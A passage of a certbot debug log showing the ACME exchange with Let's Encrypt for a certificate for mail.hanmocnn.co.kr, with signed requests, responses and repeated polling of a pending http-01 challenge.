|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480370643826"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:11,402:DEBUG:acme.client:Storing nonce: QkEzerAftIzsnOAR6XedceVkroV5M0_zuPRMcd9TlS3shn1CkbU
|
||||||
|
2026-02-14 23:36:11,402:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:11,407:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnRJenNuT0FSNlhlZGNlVmtyb1Y1TTBfenVQUk1jZDlUbFMzc2huMUNrYlUiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "VIIB53BtybPvpHqUpW6dcUf6xjmhnnx3o-qgX79kka0gM8YwirNDwgke5h9pZql7yBIkATNixyK4HCWvVlecC3MN0IkEJ53oyxZcaGfXt2QAU9i6oACnB6t-w9wBMDMnrgEUx5Li_JCkSUINfugXzI-7MOKx7p5CUBP-mYdJig3tOmJ4JGw16RO1JkSTTZdGJPWfsP5m3EE-PBXzhZpPiHtQsl_UnTKMOa87ZZx6I7W8vEOFnvkNZEoDtchZ1sUqvVHJ3ZE_eNcmvzFUaoGVuntO6FFXNZ3O9muh8G-WwvJ1bnvsvCfTqu97T-aFcMylqrcyexkH4v83QZyNqBTfvA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:11,656:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:11,657:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAfnau7eqIPQLWPi5a5DIy_NF1ZI7xZf78WAZQj3BB2Jmc
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:11,657:DEBUG:acme.client:Storing nonce: QkEzerAfnau7eqIPQLWPi5a5DIy_NF1ZI7xZf78WAZQj3BB2Jmc
|
||||||
|
2026-02-14 23:36:11,658:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:11,658:INFO:certbot._internal.auth_handler:Performing the following challenges:
|
||||||
|
2026-02-14 23:36:11,658:INFO:certbot._internal.auth_handler:http-01 challenge for Identifier(typ=IdentifierType(dns), value='mail.hanmocnn.co.kr')
|
||||||
|
2026-02-14 23:36:11,659:INFO:certbot._internal.plugins.webroot:Using the webroot path /data/letsencrypt-acme-challenge for all unmatched domains.
|
||||||
|
2026-02-14 23:36:11,659:DEBUG:certbot._internal.plugins.webroot:Creating root challenges validation dir at /data/letsencrypt-acme-challenge/.well-known/acme-challenge
|
||||||
|
2026-02-14 23:36:11,660:DEBUG:certbot._internal.plugins.webroot:Attempting to save validation to /data/letsencrypt-acme-challenge/.well-known/acme-challenge/ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24
|
||||||
|
2026-02-14 23:36:11,661:DEBUG:acme.client:JWS payload:
|
||||||
|
b'{}'
|
||||||
|
2026-02-14 23:36:11,665:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZm5hdTdlcUlQUUxXUGk1YTVESXlfTkYxWkk3eFpmNzhXQVpRajNCQjJKbWMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NoYWxsLzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2L3AycVRiQSJ9",
|
||||||
|
"signature": "UAkT6hrIidAF2zSXH_PgoxAhMbBqy_mGKDijU4JjeR5s9HJfpDcVaSqee9oN5yCkCrXnNsH9zK9wzdDgxpIDjmJkFYbjk-M_cvwcZrVOUvcMN2hND8WUmi1qFo4g6H5ac3vnrSQGmezZWqbL89jsesiFdiNTT3nybD9MDgKYNkCK9uYfvvbptHfJjqDUZxcK9_diXeEMM2k5dCm24HJ7S5wq6XJaT8UPdzpjOYy7eBwe_HoibdZbq1eSvUahqkn1EKhFherx9Jd2SezsfLyWhMELL_TX18ioAV7WpbjGCZHdA_u2A8F2qZ43VDdTMn0ojFwn0po9RLHcyRGViSkvmg",
|
||||||
|
"payload": "e30"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:11,847:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/chall/3064386906/658784998136/p2qTbA HTTP/1.1" 200 195
|
||||||
|
2026-02-14 23:36:11,847:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:11 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 195
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136>;rel="up"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA
|
||||||
|
Replay-Nonce: QkEzerAfyFjzenBtnWm5ThEx-u50IhDeHdl1yAtHn2-mTwQsAHY
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:11,848:DEBUG:acme.client:Storing nonce: QkEzerAfyFjzenBtnWm5ThEx-u50IhDeHdl1yAtHn2-mTwQsAHY
|
||||||
|
2026-02-14 23:36:11,848:INFO:certbot._internal.auth_handler:Waiting for verification...
|
||||||
|
2026-02-14 23:36:12,849:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:12,854:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZnlGanplbkJ0bldtNVRoRXgtdTUwSWhEZUhkbDF5QXRIbjItbVR3UXNBSFkiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "OQKujp_YXK3K3_7tpgFsoWLqJKMQ32y9o4du19oagQFikl-ooY1XplCBv0vZ2Cy7cjtAvXbYNW1ghSEZFV6biikNZPikRUQYgKs_bLwWZ-0i1Kn8lMFYAwx0mAjkzOpKuIuwrtRkK9lJ32NbbUrk4DDt4KLvvvyPbEyQPebyyJgT38lnbjt-4oiiWZbxHuEvZ1bvnqcsQ-tZAd4qvKRAn7_Vbxl6saSycUUqSzigxEZzHFu4IlSaxDZrU0vnlNv8cf40HD6cvbd6BIEsTpEKBm-yeurlMUiyJo2NRoD_rwhuqSzXFOxEbVwG8dfsTpe0buuj9UZN2H0zwsgs8Q8u2w",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:13,032:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:13,032:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:12 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: QkEzerAflncOZ2f0u4eATJ9eSGomWMbHzbsJNBK62N4voB5ey8s
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:13,033:DEBUG:acme.client:Storing nonce: QkEzerAflncOZ2f0u4eATJ9eSGomWMbHzbsJNBK62N4voB5ey8s
|
||||||
|
2026-02-14 23:36:13,033:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:16,034:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:16,039:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJRa0V6ZXJBZmxuY09aMmYwdTRlQVRKOWVTR29tV01iSHpic0pOQks2Mk40dm9CNWV5OHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "wtj2sJb8hLpscvxxPJsaTgcupXELXXz3myVAWrKl-H_NLOj9Pj9MNJAFctIQcGrhD18FT62piRVaPXqhCgHA5T60IInIsA8Dkw2nJ_nO7lUXyDPBvkUy4zIiyws4ltD88TM8H2cJ1X11l_wSsRxBdUHS-lZcCxKZN-QWc7Wjq3hJ0qsQ0Nwob1yMVqodkVG_o9K5f9oM56A63Zq4iaSBqs28NrNgLE2yq5KpzV8IOpoLSrCStcsOiZmfF8edr8wvncdBWCJdbkhhlQAVfDCQwcTybTaiAXN6Xru5S7xjgUBcnI8xAChomx4_rlPuAk09wPpYDItLjPKLAMRq29u2dA",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:16,216:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:16,217:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:16 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfe4idDbaofJZEFmdD8V0V6aCrW_ZaD1VYSQc3EaWyUK4
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:16,217:DEBUG:acme.client:Storing nonce: qLPTsdtfe4idDbaofJZEFmdD8V0V6aCrW_ZaD1VYSQc3EaWyUK4
|
||||||
|
2026-02-14 23:36:16,217:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:19,218:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:19,223:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZmU0aWREYmFvZkpaRUZtZEQ4VjBWNmFDcldfWmFEMVZZU1FjM0VhV3lVSzQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "ciW6DyQP78rgmZ51FyebnqW3KJL-Uy0ywjJZmLJyQrJ4XrIu-Ez9FYjZz26LLb4tQOOq8rXagdVrZxz-Lxsix8ZeUKbdl64oo0SM4gNkmym9vtieX4hpYoattzSRfwU11cnFU6TS71zfLyFUbFqqBZRDwYnqG400lFNfskR3Sid2xMNs5nFDqdQHHjjr7WW_AiaeGHxtLvuGVmnlSbKaW-06uUKqmafzkvIbSb0YtvfiYQtdhTdjnFwvSStUbaRILk_qk4TX_yqTgolzrFEHHXuwuMRknrDVAaPbqVKRCULFyhRWc73sY7RD_dJqdAyBuiiFH-fiWE0OcqSeVn5PJw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:19,401:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:19,401:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:19 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfUlY8XCOMYlSi2vd46PnCUhYRfLnBpl_jWN1WcGK44m8
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:19,402:DEBUG:acme.client:Storing nonce: qLPTsdtfUlY8XCOMYlSi2vd46PnCUhYRfLnBpl_jWN1WcGK44m8
|
||||||
|
2026-02-14 23:36:19,402:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:22,403:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:22,408:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZlVsWThYQ09NWWxTaTJ2ZDQ2UG5DVWhZUmZMbkJwbF9qV04xV2NHSzQ0bTgiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "FeEWQxADvM2U39b3BudpI4fbKijrnNyjRMuioQY1M9xqYMddQRCVrEB1wgskJpptl9bXVPM3_dziTWrLoXZeOe2fHk0tctPgFVznmUNZ2brEBe_73jmNjxBmiVWLDyVp_vj0onI0ViwCWBrNvCysuQjceVKNHH37SbcAiS1hOkHrM3goEdVCp3PoZIWLB1YpYGBDFNkBcsDAvFCqFc2_-Ui_3qPNmyoG9gcr5tGM2AMhIgFBGDc5cGKEKbpbakliROV6vd7nzKgUqFiZgBGx_lb2AGd54BSUY9eS7j6uXq3GwaXKCVDKsDZYZKxsgAslt215LDzsMSiW8TbEVzk2Uw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:22,585:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:22,586:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:22 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtfZSPw3OwZzqqGDC5sVorVx2_eKsz74AzvgSTf6Jzzlm4
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "tls-alpn-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "dns-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/4dbIHw",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
"token": "ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24"
|
||||||
|
}
|
||||||
|
]
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:22,586:DEBUG:acme.client:Storing nonce: qLPTsdtfZSPw3OwZzqqGDC5sVorVx2_eKsz74AzvgSTf6Jzzlm4
|
||||||
|
2026-02-14 23:36:22,586:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/FsOhrQ', 'status': 'pending', 'token': 'ujLzNrnRNRlt78gMxTXsvaVIuWUL1WNgn3KjuF7fQ24'}
|
||||||
|
2026-02-14 23:36:25,587:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-14 23:36:25,592:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658784998136:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJxTFBUc2R0ZlpTUHczT3daenFxR0RDNXNWb3JWeDJfZUtzejc0QXp2Z1NUZjZKenpsbTQiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzMwNjQzODY5MDYvNjU4Nzg0OTk4MTM2In0",
|
||||||
|
"signature": "EPwBlNMTpV945kv0wjedT5sN_-EZ66YiQ2hMIMnk642rDcmD3QxXvRorvW-UZXGOW-zDH9_FJ6mXnxHm0TmbVp3qHXIRHhmM7pJKTuuO5Q9bh2Tg5iquTnkOwGhYRSAL9947GxQP6SWAP2tw5LgC3QNDNfh_PQu477BX_SPUI_7N3XksR2_YRq5FJMRGiLAHzJ6a4jS8Qw7iVYUu-JXUNuWDcWr2qBAjUA4wFJDBLZP1bKCOP0GNenx78BAjjlqGxOA6y6U_Vve2hQpRrnMkdFpn0JaqVi7S54VN8_cdv6VFs1nvfAKWR7mFWSFUp8y5-oeRU6t0dw88O2FCb4Gtvw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-14 23:36:25,782:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/3064386906/658784998136 HTTP/1.1" 200 827
|
||||||
|
2026-02-14 23:36:25,783:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sat, 14 Feb 2026 23:36:25 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 827
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Replay-Nonce: qLPTsdtftvIGI-AgfpmS47Trma8dIcmIOln0-CDc_3wXfIK3OAw
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"identifier": {
|
||||||
|
"type": "dns",
|
||||||
|
"value": "mail.hanmocnn.co.kr"
|
||||||
|
},
|
||||||
|
"status": "pending",
|
||||||
|
"expires": "2026-02-21T23:36:11Z",
|
||||||
|
"challenges": [
|
||||||
|
{
|
||||||
|
"type": "http-01",
|
||||||
|
"url": "https://acme-v02.api.letsencrypt.org/acme/chall/3064386906/658784998136/p2qTbA",
|
||||||
|
"status": "pending",
|
||||||
|
